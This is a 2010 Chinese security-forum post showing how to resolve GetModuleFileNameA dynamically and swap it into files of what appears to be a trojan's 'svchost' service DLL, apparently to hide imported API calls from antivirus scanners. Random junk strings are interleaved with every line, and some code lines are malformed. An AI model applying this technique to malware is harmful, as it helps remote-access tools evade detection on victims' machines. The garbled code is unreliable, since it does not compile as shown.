标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
/ F9 K' r+ h8 `: x
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
8 f8 i! e: h' F1 c% l3 }
----------------------------------------
' O4 H& m- u' o9 l' V
DTDY.h:
, z* W& h3 A3 r3 W" Z
% r" y2 H& x3 ^! h& ?
#if _MSC_VER>1000
8 m! Z5 C7 N) a6 [
#pragma once
$ O' ?. `3 ^6 O/ o$ k
#endif //_MSC_VER>1000
& ^( S3 Z/ `. l# [8 ?0 p
#include<windows.h>
- ]" Q3 Q" S( i5 s
% f5 Q' _ A5 c. A
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
! J2 R5 E4 X* f9 M" `
class DTDY
& o' z1 }8 K1 I! J F7 K
{
9 G- D3 K* Q u- i! u* e3 @& M
public:
1 T( B" Z) R7 I- V& \' q
DTDY();
3 e- D6 a' V/ A* e
virtual ~DTDY();
- e; G7 }- K) S0 @ x
public:
0 |( I) z$ o6 o
static pGetModuleFileNameA MyGetModuleFileName;
+ l9 e: S( j; k# m
static BOOL FunInitiallization();
* \: U W2 ]0 @# c h
};
+ ~. w* Z0 z' S1 V% b! ]% T
#endif
6 E- A* m$ V$ H& \" L
----------------------------------------
" y$ ~" W$ W$ C8 M
8 R. q7 W( J: m0 n; C
DTDY.cpp:
3 w7 U( T+ l9 s% r1 _# M2 A+ ?
/ [- }' A1 p" O5 n; T' p
#include "DTDY.h"
4 P; n3 [( X- o6 X% w0 ~' m
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
0 Z3 J% m& e: { B( k {& E
DTDY:TDY()
0 l" |3 ]# z1 a0 C
{
# t$ ]- \ ?$ r1 m% o# [) e& O- b, R* W
}
5 W) `& h# y: R* V* L Q9 E9 e
DTDY::~DTDY()
4 a# W# N- p( F9 o
{
' I3 N$ r" ]* o5 i6 P- {
}
4 _4 W, z% E' f4 c% m
BOOL DTDY::FunInitiallization()
! D4 q& P! _) ]
{
+ t. n) Q( ?* q: B5 ?, T# V
HMODULE hModule=LoadLibrary("kernel32.dll");
* r9 g4 U* t+ a5 k& |$ y0 j" p' w
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
3 g5 z7 Z1 @, S4 e% C) o, F* b9 D0 I# r
if(!MyGetModuleFileName=) return FALSE;
# @6 b, i& Z1 d# ?
- G# Z3 Q6 Y6 L; G& O
return TRUE;
5 ? i4 Q* ]- m4 C+ k& f3 W l
}
5 C/ j3 G6 A; @# u8 T- O9 ]3 O% g, u
----------------------------------------
( F9 r. I! h) u; T
svchost.cpp:
# a2 c5 s' ~% c1 Z* B. I
0 ]& {" X% Z- h# ~' M7 J( Y
#include "DTDY.h"
* R/ ?8 W+ G6 p+ M4 `
2 H( K1 c2 n% v
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
5 M6 P0 [" x! X6 \. n5 T
{
0 W3 l! c/ m6 Z- o) \+ M
switch(ul_reason_for_call)
[$ k0 ?1 q: u) C
{
. y! m/ ~# m+ t/ a& t' O
case DLL_PROCESS_ATTACH:
' y- `2 D5 T8 ] f0 f
if(!DTDY::FunInitiallization()) return FALSE;
: Q% }6 n$ O* e; j2 I0 R: [
& J/ k- n2 |. m' q" W" U
break;
1 m8 ], ~, [4 P
}
; R$ e7 e/ a+ a3 A* p
}
5 m6 f1 W8 u6 K. b5 W
$ r$ v2 p4 E+ ~2 @4 y7 W* D
7 _" R' y3 ]( U# ^
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
: E3 r5 w- Y; l* x1 }
改写为
$ F7 \7 c+ B: a* b
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
) d/ m' J* r' F5 q2 R
----------------------------------------
- g& A* Z$ R$ p- g" N8 |+ S( t
KernelManager.cpp:
( y$ M4 R8 t `# {) Q
5 d( f8 ~" p4 n! f- ]* l5 b5 q
#include "../DTDY.h"
7 B. N @9 i! l: c
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
) f- _ i1 C; G- i" L
改写为
) X) z+ t% H: }) [4 A
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
+ W# J3 J/ j& b, `' ~7 R+ ~! w
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
